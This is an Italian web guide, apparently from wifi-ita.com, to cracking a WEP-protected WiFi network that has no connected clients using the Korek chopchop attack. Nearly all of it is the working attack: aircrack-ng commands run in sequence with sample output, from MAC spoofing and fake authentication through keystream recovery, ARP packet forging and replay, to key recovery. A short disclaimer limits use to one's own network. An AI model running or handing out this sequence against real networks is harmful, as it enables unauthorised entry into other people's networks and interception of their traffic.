WEP crack senza clients attivi v.3

Ecco un'altra guida su come utilizzare il Korek Chopchop Attack, ovvero nel caso non ci siano client attivi.

INTENDIAMO RICORDARE CHE ENTRARE IN UNA RETE WiFi PROTETTA E' UN REATO PRESEGUIBILE A TERMINI DI LEGGE, RAGION PER CUI QUESTA GUIDA E' DA RIFERIRSI A UNA PROVA SULLA PROPRIA RETE.
AL FINE DI GIUDICARNE LA SICUREZZA. WIFI-ITA.COM E GLI AMMINISTRATORI NON POTRANNO ESSERE RITENUTI RESPONSABILI DI EVENTUALI VIOLAZIONI EFFETTUANDO UN USO ERRATO DI QUESTA GUIDA.
Vedere la NORMATIVA sul Wireless.

Innanzitutto cambiamo il nostro MAC:

Codice:
ifconfig <interfaccia> down
ifconfig <interfaccia> hw ether <nuovo MAC>
ifconfig <interfaccia> up

Impostiamo la nostra scheda di rete in monitor mode:

Codice:
airmon-ng start <interfaccia>

Facciamo partire lo sniffer per catturare i pacchetti:

Codice:
airodump-ng -c <canale> --bssid <Access Point MAC> -w <file> <interfaccia>

Injection test con -9:

Codice:
aireplay-ng -9 <interfaccia>

controlliamo se funziona l'injection, se la % è troppo bassa regoliamo il rate con:

Codice:
iwconfig <interfaccia> rate 1M

prima di settare 1M tentate qualche valore intermedio tipo 11M, perchè anche se con 1M aumenta l'accuratezza, diminuisce la velocità d'injection

Ci autentichiamo all'Access Point:

Codice:
aireplay-ng -1 0 -q 20 -e <Access Point ESSID> -a <Access Point MAC> -h <nostro MAC> <interfaccia>


-1 indica la fake authentication
-q indica di mandare pacchetti ogni tot secondi per mantenere la connessione attiva

Il sistema risponderà:

    18:18:20 Sending Authentication Request
    18:18:20 Authentication successful
    18:18:20 Sending Association Request
    18:18:20 Association successful Smile

connessione stabilita

Codice:
aireplay-ng -4 -h <nostro MAC> -b <Access Point MAC> <interfaccia>

-4 indica il Korek Chopchop Attack

Il sistema risponderà:

    Waiting for a data packet...
    Read 127 packets...

    Size: 114, FromDS: 1, ToDS: 0 (WEP)

    BSSID = XX:XX:XX:XX:XX:XX
    Dest. MAC = XX:XX:XX:XX:XX:XX
    Source MAC = XX:XX:XX:XX:XX:XX

    0x0000: 0842 0000 0100 5e00 00fb 0014 6c7e 4080 .B....^.....l~@.
    0x0010: 0040 f477 e5c9 6052 8c00 0000 3073 d265 .@.w..`R....0s.e
    0x0020: c402 790b 2293 c7d5 89c5 4136 7283 29df ..y.".....A6r.).
    0x0030: 4e9e 5e13 5f43 4ff5 1b37 3ff9 4da4 c03b N.^._CO..7?.M..;
    0x0040: 8244 5882 d5cc 7a1f 2b9b 3ef0 ee0f 4fb5 .DX...z.+.>...O.
    0x0050: 4563 906d 0d90 88c4 5532 a602 a8ea f8e2 Ec.m....U2......
    0x0060: c531 e214 2b28 fc19 b9a8 226d 9c71 6ab1 .1..+(...."m.qj.
    0x0070: 9c9f ..

    Use this packet ? y

Premiamo "y" per dare conferma

Il sistema risponderà:
    Offset 48 (71% done) | xor = 34 | pt = E5 | 48 frames written in 142ms
    Offset 47 (73% done) | xor = 34 | pt = 77 | 64 frames written in 192ms
    Offset 46 (75% done) | xor = 51 | pt = F4 | 253 frames written in 759ms
    Offset 45 (76% done) | xor = 98 | pt = 40 | 109 frames written in 327ms
    Offset 44 (78% done) | xor = 3D | pt = 00 | 242 frames written in 726ms
    Offset 43 (80% done) | xor = 5E | pt = 01 | 194 frames written in 583ms
    Offset 42 (82% done) | xor = AF | pt = 00 | 99 frames written in 296ms
    Offset 41 (84% done) | xor = C4 | pt = 04 | 164 frames written in 492ms
    Offset 40 (86% done) | xor = CE | pt = 06 | 69 frames written in 207ms
    Offset 39 (88% done) | xor = 9D | pt = 00 | 137 frames written in 411ms
    Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
    Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
    Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
    Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms

    Saving keystream in replay_dec-xxxx-xxxxxx.xor

copiamo il nome replay_dec-xxxx-xxxxxx.xor e lo incolliamo nel passo successivo per creare il pacchetto con packetforge

Codice:
packetforge-ng -0 -a <Access Point MAC> -h <nostro MAC> -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-xxxx-xxxxxx.xor -w arp-request

-0 vuol dire che stiamo creando un pacchetto arp
-l indica l'IP sorgente - lasciamo 255.255.255.255
-k indica l'IP destinazione - lasciamo 255.255.255.255

Il sistema risponderà:

    Wrote packet to: arp-request

iniettiamo i pacchetti

Codice:
aireplay-ng -2 -r arp-request <interfaccia>

Il sistema risponderà:

    size: 68, FromDS: 0, ToDS: 1 (WEP)

    BSSID = XX:XX:XX:XX:XX:XX
    Dest. MAC = XX:XX:XX:XX:XX:XX
    Source MAC = XX:XX:XX:XX:XX:XX

    0x0000: 0841 0201 0014 6c7e 4080 0009 5bec eef2 .A....l~@...[...
    0x0010: ffff ffff ffff 8001 8f00 0000 7af3 8be4 ............z...
    0x0020: c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ...........q.Z8.
    0x0030: f286 fdb3 55ee 113e da14 fb19 17cc 0b5e ....U..>.......^
    0x0040: 6ada 92f2 j...

    Use this packet ? y

Premiamo "y" per dare conferma

Controlliamo che su airodump che i #data arrivino a circa 50.000 e lanciamo aircrack:

Codice:
aircrack-ng -z -b <Access Point MAC> <file*.cap>



WEP KEY FOUNDED!

Si ringrazia Miklee per aver fornito questa ottima guida


Tags Cloud 3D

Bookmarks

Delicious Technorati Furl Yahoo_myweb Google_bmarks Windows_live Digg Newsvine MySocialBookmark Social Bookmark Script 

Supportaci





Aggiungi questo sito ai preferiti
Scegli come Homepage